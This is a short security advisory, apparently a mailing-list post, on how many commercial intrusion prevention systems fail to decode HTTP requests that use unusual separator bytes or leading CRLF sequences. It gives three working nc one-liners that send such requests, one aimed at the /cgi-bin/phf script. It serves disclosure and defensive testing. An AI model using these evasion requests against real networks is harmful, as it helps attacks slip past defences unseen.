Various commercial IPS products fail to decode HTTP requests that contain 0x0c, 0x0b, and 0x0d instead of normal 0x20/0x09 separators.
8bd2fb21a6f9fe779b10b9809f5d7d778051d40abcfa264fa44340d85608f90a
Summarized from https://strikecenter.bpointsys.com/
Many commercial IPS products fail to decode HTTP requests which use 0x0c,
0x0b, and 0x0d instead of the normal 0x20/0x09 separators. A request in
the following format will evade most IPS protocol decoders:
$ echo -ne "GET\x0c/cgi-bin/phf\x0cHTTP/1.0\r\n\r\n" | \
nc webserver 80
A request which contains multiple CRLF sequences instead of a valid method
is processed by Apache, yet ignored by most IPS engines:
$ echo -ne "\r\n\r\n\r\n\r\n\r\n /buggy.php HTTP/1.0\r\n\r\n" | \
nc webserver 80
The first issue was covered more than a year ago, yet most IPS vendors
have failed to address it. The second issue is new, as far as I know. You
can even combine them:
$ echo -ne "\r\n\r\n\r\n\r\n\r\n\x0c/buggy.php\x0bHTTP/1.0\r\n\r\n" | \
nc webserver 80
-HD